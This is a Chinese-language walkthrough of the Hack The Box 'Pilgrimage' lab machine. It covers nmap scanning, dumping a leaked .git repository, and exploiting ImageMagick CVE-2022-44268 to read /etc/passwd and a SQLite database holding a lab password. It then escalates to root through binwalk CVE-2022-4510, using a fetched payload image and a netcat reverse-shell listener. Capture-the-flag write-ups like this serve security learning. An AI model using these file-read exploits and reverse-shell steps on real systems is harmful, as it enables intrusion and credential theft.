信息搜集

nmap端口扫描

发现22和80端口

1
2
3
4
5
6
7
8
9
sudo nmap -p- --min-rate 10000 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-24 12:37 CST
Warning: 10.10.11.219 giving up on port because retransmission cap hit (10).
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.090s latency).
Not shown: 63504 closed tcp ports (reset), 2029 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

nmap详细扫描

发现 pilgrimage.htb (10.10.11.219)以及Git repository,将域名和ip加入/etc/hosts;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
sudo nmap -sT -sV -sC -O -p80 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-24 12:40 CST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for pilgrimage.htb (10.10.11.219)
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0
|_http-title: Pilgrimage - Shrink Your Images
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-git: 
|   10.10.11.219:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Pilgrimage image shrinking service initial commit. # Please ...
|_http-server-header: nginx/1.18.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall
Running: Fortinet embedded
OS details: Fortinet FortiGate-50B or 310B firewall

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds

GITHACK扫描

根据上一步搜集的Git repository;知道有git泄露;

1
python3 GitHack.py http://pilgrimage.htb/.git/
1
2
3
4
5
6
7
8
9
10
11
12
ls -al
总计 26968
drwxr-xr-x 4 kali kali     4096  1月24日 12:46 .
drwxr-xr-x 5 kali kali     4096  1月24日 12:45 ..
drwxr-xr-x 6 kali kali     4096  1月24日 12:45 assets
-rw-r--r-- 1 kali kali     5538  1月24日 12:46 dashboard.php
-rw-r--r-- 1 kali kali     9250  1月24日 12:46 index.php
-rw-r--r-- 1 kali kali     6822  1月24日 12:46 login.php
-rw-r--r-- 1 kali kali       98  1月24日 12:46 logout.php
-rw-r--r-- 1 kali kali 27555008  1月24日 12:46 magick
-rw-r--r-- 1 kali kali     6836  1月24日 12:46 register.php
drwxr-xr-x 4 kali kali     4096  1月24日 12:46 vendor

user

imagemagick

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#index.php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
  $image = new Bulletproof\Image($_FILES);
  if($image["toConvert"]) {
    $image->setLocation("/var/www/pilgrimage.htb/tmp");
    $image->setSize(100, 4000000);
    $image->setMime(array('png','jpeg'));
    $upload = $image->upload();
    if($upload) {
      $mime = ".png";
      $imagePath = $upload->getFullPath();
      if(mime_content_type($imagePath) === "image/jpeg") {
        $mime = ".jpeg";
      }
      $newname = uniqid();
      exec("/var/www/pilgrimage.htb/magick convert /var/www/pilgrimage.htb/tmp/" . $upload->getName() . $mime . " -resize 50% /var/www/pilgrimage.htb/shrunk/" . $newname . $mime);
      unlink($upload->getFullPath());
      $upload_path = "http://pilgrimage.htb/shrunk/" . $newname . $mime;
      if(isset($_SESSION['user'])) {
        $db = new PDO('sqlite:/var/db/pilgrimage');
        $stmt = $db->prepare("INSERT INTO `images` (url,original,username) VALUES (?,?,?)");
        $stmt->execute(array($upload_path,$_FILES["toConvert"]["name"],$_SESSION['user']));
      }
      header("Location: /?message=" . $upload_path . "&status=success");
    }

分析代码,可以看出它处理网站上图像的上传和调整大小。它还验证用户是否经过身份验证并返回他们的用户名。如果请求是 POST 方法并且发送图像以调整大小,则代码会处理该图像,将其保存到特定位置,并将信息记录在数据库中。随后,用户被重定向到基于该过程的结果显示成功或失败消息的页面。

该代码利用 ImageMagick(特别是“magick Convert”命令)来调整上传文件的大小并将其保存在 /shrunk 路径中

ImageMagick从命令行调用magick,是一个免费的开源跨平台软件套件,用于显示、创建、转换、修改和编辑光栅图像

查看magick版本得知7.1.0-49,此版本存在CVE-2022-44268,任意文件读取漏洞;

1
2
3
4
5
6
7
./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5) 
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

直接利用poc

1
2
git clone https://github.com/voidz0r/CVE-2022-44268
cargo run "/etc/passwd"

Cargo 是Rust 编程语言的构建和依赖管理工具。Cargo 为 Rust 项目提供构建、测试和依赖管理功能。

上传生成的image.png图片,并下载下来

identify命令通常用于识别和显示图像文件的信息,比如格式、分辨率、色彩深度等;-verbose参数用于显示更详细的图像信息,包括像素值、颜色深度、压缩类型等。使用-verbose参数可以获取更全面的图像文件信息。

grep工具,其中-P参数表示使用Perl兼容的正则表达式,-v参数表示反向匹配,即匹配不包含指定模式的行。

正则表达式”^( |Image)”的意思是匹配以空格或者”Image”开头的行。因此,整个命令的意思是从输入中过滤掉以空格或”Image”开头的行,只显示不匹配这个模式的行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
identify -verbose 65b098f813ad9.png|grep -Pv "^( |Image)" 

726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173680a6461656d
6f6e3a783a313a313a6461656d6f6e3a2f7573722f7362696e3a2f7573722f7362696e2f
6e6f6c6f67696e0a62696e3a783a323a323a62696e3a2f62696e3a2f7573722f7362696e
2f6e6f6c6f67696e0a7379733a783a333a333a7379733a2f6465763a2f7573722f736269
6e2f6e6f6c6f67696e0a73796e633a783a343a36353533343a73796e633a2f62696e3a2f
62696e2f73796e630a67616d65733a783a353a36303a67616d65733a2f7573722f67616d
65733a2f7573722f7362696e2f6e6f6c6f67696e0a6d616e3a783a363a31323a6d616e3a
2f7661722f63616368652f6d616e3a2f7573722f7362696e2f6e6f6c6f67696e0a6c703a
783a373a373a6c703a2f7661722f73706f6f6c2f6c70643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d61696c3a783a383a383a6d61696c3a2f7661722f6d61696c3a2f757372
2f7362696e2f6e6f6c6f67696e0a6e6577733a783a393a393a6e6577733a2f7661722f73
706f6f6c2f6e6577733a2f7573722f7362696e2f6e6f6c6f67696e0a757563703a783a31
303a31303a757563703a2f7661722f73706f6f6c2f757563703a2f7573722f7362696e2f
6e6f6c6f67696e0a70726f78793a783a31333a31333a70726f78793a2f62696e3a2f7573
722f7362696e2f6e6f6c6f67696e0a7777772d646174613a783a33333a33333a7777772d
646174613a2f7661722f7777773a2f7573722f7362696e2f6e6f6c6f67696e0a6261636b
75703a783a33343a33343a6261636b75703a2f7661722f6261636b7570733a2f7573722f
7362696e2f6e6f6c6f67696e0a6c6973743a783a33383a33383a4d61696c696e67204c69
7374204d616e616765723a2f7661722f6c6973743a2f7573722f7362696e2f6e6f6c6f67
696e0a6972633a783a33393a33393a697263643a2f72756e2f697263643a2f7573722f73
62696e2f6e6f6c6f67696e0a676e6174733a783a34313a34313a476e617473204275672d
5265706f7274696e672053797374656d202861646d696e293a2f7661722f6c69622f676e
6174733a2f7573722f7362696e2f6e6f6c6f67696e0a6e6f626f64793a783a3635353334
3a36353533343a6e6f626f64793a2f6e6f6e6578697374656e743a2f7573722f7362696e
2f6e6f6c6f67696e0a5f6170743a783a3130303a36353533343a3a2f6e6f6e6578697374
656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d6e6574776f72
6b3a783a3130313a3130323a73797374656d64204e6574776f726b204d616e6167656d65
6e742c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c6f67696e
0a73797374656d642d7265736f6c76653a783a3130323a3130333a73797374656d642052
65736f6c7665722c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f
6c6f67696e0a6d6573736167656275733a783a3130333a3130393a3a2f6e6f6e65786973
74656e743a2f7573722f7362696e2f6e6f6c6f67696e0a73797374656d642d74696d6573
796e633a783a3130343a3131303a73797374656d642054696d652053796e6368726f6e69
7a6174696f6e2c2c2c3a2f72756e2f73797374656d643a2f7573722f7362696e2f6e6f6c
6f67696e0a656d696c793a783a313030303a313030303a656d696c792c2c2c3a2f686f6d
652f656d696c793a2f62696e2f626173680a73797374656d642d636f726564756d703a78
3a3939393a3939393a73797374656d6420436f72652044756d7065723a2f3a2f7573722f
7362696e2f6e6f6c6f67696e0a737368643a783a3130353a36353533343a3a2f72756e2f
737368643a2f7573722f7362696e2f6e6f6c6f67696e0a5f6c617572656c3a783a393938
3a3939383a3a2f7661722f6c6f672f6c617572656c3a2f62696e2f66616c73650a

进行hex解码得到如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
emily:x:1000:1000:emily,,,:/home/emily:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

其中明显存在一个用户:emily

在register.php中可以知道数据库为sqlite且文件路径为/var/db/pilgrimage

1
2
3
4
5
6
7
8
#register.php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['username'] && $_POST['password']) {
  $username = $_POST['username'];
  $password = $_POST['password'];

  $db = new PDO('sqlite:/var/db/pilgrimage');
  $stmt = $db->prepare("INSERT INTO `users` (username,password) VALUES (?,?)");
  $status = $stmt->execute(array($username,$password));

尝试得到”/var/db/pilgrimage”文件,重复上面的操作,上传图像并下载;

1
cargo run "/var/db/pilgrimage"
1
2
3
4
5
identify -verbose 65b09b31d31ba.png| grep -Pv "^( |Image)"

53514c69746520666f726d617420330010000101004020200000007c0000000500000000
000000000000000400000004000000000000000000000001000000000000000000000000
00000000000000000000000000000000000000000000007c002e4b910d0ff800040*****

因为它是二进制数据,并且脚本似乎只支持 ASCII 文本。我可以手动从文件中获取数据。我将从网站下载该文件,并稍微使用一下grep,我可以仅隔离带有十六进制数据的行,然后使用xxd将其转换回二进制:

1
identify -verbose 65b09b31d31ba.png| grep -Pv "^( |Image)"| xxd -r -p > pilgrimage.sqlite

使用了xxd工具,-r参数表示将十六进制转换为二进制,-p参数表示使用简洁模式(不输出地址和ASCII码),>表示将输出重定向到文件pilgrimage.sqlite中。

pilgrimage.sqlite的users表中发现用户emily的密码,

1
2
3
4
5
6
7
8
chmod +x ./pilgrimage.sqlite 
                                                                                                                   sqlite3 pilgrimage.sqlite 
SQLite version 3.43.1 2023-09-11 12:01:27
Enter ".help" for usage hints.
sqlite> .tables
images  users 
sqlite> select * from users;
emily|abigchonkyboi123

ssh连接

1
2
ssh emily@10.10.11.219
password:abigchonkyboi123

binwalk

权限检查

1
2
3
emily@pilgrimage:~$ sudo -l 
[sudo] password for emily: 
Sorry, user emily may not run sudo on pilgrimage.

find / -perm -u=s -type f 2>/dev/null也无果之后查看root进程;

1
2
3
4
5
6
7
ps -aux|grep root
root         765  0.0  0.0   6816  2844 ?        Ss   Nov09   0:00 /bin/bash /usr/sbin/malwarescan.sh
root         766  0.0  0.0      0     0 ?        S    Nov09   0:00 [hwmon1]                    
root         771  0.0  0.6 209752 27736 ?        Ss   Nov09   1:07 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
root         773  0.0  0.1 220796  6840 ?        Ssl  Nov09   0:00 /usr/sbin/rsyslogd -n -iNONE 
root         775  0.0  0.0   2516   720 ?        S    Nov09   0:00 /usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/
root         776  0.0  0.0   6816  2288 ?        S    Nov09   0:00 /bin/bash /usr/sbin/malwarescan.sh

根正在运行/usr/sbin/malwarescan.sh。还有一个inotifywait正在运行的进程正在监视要在目录中创建的文件/var/www/pilgrimage.htb/shrunkinotifywait是一种每当文件系统上发生某些事件时触发进程的方法。

/usr/sbin/malwarescan.sh内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/bash

blacklist=("Executable script" "Microsoft executable")

/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
        filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
        binout="$(/usr/local/bin/binwalk -e "$filename")"
        for banned in "${blacklist[@]}"; do
                if [[ "$binout" == *"$banned"* ]]; then
                        /usr/bin/rm "$filename"
                        break
                fi
        done
done

inotifywait是一个Linux命令行工具,用于监视文件系统事件。它依赖于Linux内核提供的inotify接口,可以监视文件或目录的变化,比如文件的创建、删除、修改、移动等操作。当指定的文件或目录发生变化时,inotifywait可以立即响应并执行相应的操作,比如运行特定的命令或脚本

Binwalk 是一个用于搜索给定二进制图像中嵌入文件和可执行代码的工具。具体来说,它设计用于识别固件映像中嵌入的文件和代码。

发现的Binwalk版本为2.3.2,该版本存在允许任意代码执行的漏洞CVE-2022-4510。我们将利用此漏洞来升级我们的访问权限。

利用poc

1
python3 exp.py  image.png  10.10.16.8 5555

将生成的”binwalk_exploit.png”上传到”/var/www/pilgrimage.htb/shrunk/“目录下

1
python3 -m http.server
1
wget http://10.10.16.8:8000/binwalk_exploit.png

本地监听得到反弹shell

1
nc -lnvp 5555

总结

使用nmap扫描出80端口和git泄露;审计源码;发现上传后的文件会经过magick处理,而git泄露了magick二进制文件;magick --version发现此版本存在任意文件读取漏洞;在源码中发现了数据库sqlite的数据库文件路径,通过magick泄露出数据库文件;从中发现了用户名及密码:emily|abigchonkyboi123;ssh连接后,常规权限检查并没有发现可利用点,通过查找root用户进程,/usr/sbin/malwarescan.sh中执行这binwalk -e $filename操作,并且binwalk版本为2.3.2存在任意命令执行漏洞;最终利用此漏洞提权成功